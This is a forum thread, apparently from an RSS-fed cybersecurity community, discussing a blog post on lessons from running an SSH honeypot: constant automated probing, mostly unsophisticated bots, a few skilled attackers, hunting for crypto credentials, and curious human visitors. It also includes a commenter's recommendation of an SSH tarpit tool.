Cyber Security news and links to cyber security stories that could make you go hmmm. The content is exactly as it is consumed through RSS feeds and wont be edited (except for the occasional encoding errors).
This community is automagically fed by an instance of Dittybopper.
That's pretty interesting.
I have been running an SSH tarpit for several years. Basically it's a tiny go executable that responds to SSH connections, and then proceeds to very very slowly respond with an endless banner. So clients wait endlessly for the login prompt. I have seen clients getting stuck and waiting for whole weeks.
Link for anyone who wants to run a tarpit themselves: https://github.com/skeeto/endlessh
I'm out.
What I Learned
- The internet is loud
Your server isn't special. Nobody is "targeting" it. Every IP address on the internet is being continuously probed by automated systems. Within seconds of exposing port 22, you will receive login attempts. This isn't a question of "if" but "when" — and the answer to "when" is "immediately."
- Most attackers are dumb
99.6% of the visitors never went beyond a single automated command. They're not hackers — they're scripts running on compromised machines, following instructions from a C2 server, executing the same uname command a million times a day across millions of IPs. The vast majority of internet "attacks" are just noise.
- The few smart ones are very smart
That French IP with the /dev/tcp/ trick, rotating C2 infrastructure, and UPX-packed binaries? That's professional-grade offensive tooling. The gap between the bottom 99% and the top 1% of attackers is enormous.
- Crypto is a magnet
The volume of attempts targeting Solana node credentials (solana/sol/validator/node) was surprising. Running crypto infrastructure on a publicly-accessible SSH port without key-based auth is actively being hunted.
- Some people are just curious
The explorer from Cameroon, the slow typer from Berlin, the person from Bangladesh poking around /var and creating text.txt — these aren't malicious actors. They're curious humans who found an open door and wanted to see what was on the other side. They didn't download malware or try to establish persistence. They just... looked around.
- Nobody reads the MOTD
The honeypot displays a full Ubuntu welcome message with system stats when you log in. Not a single interactive user appeared to notice or care that the system information was suspiciously static. First thing they do? ls.
Very much worth a read!
That was an interesting read.Thank you.
Hey, the comments link isn't actually a link, whoever is running this bot.
Oh wow 🙄. Thanks for letting me know.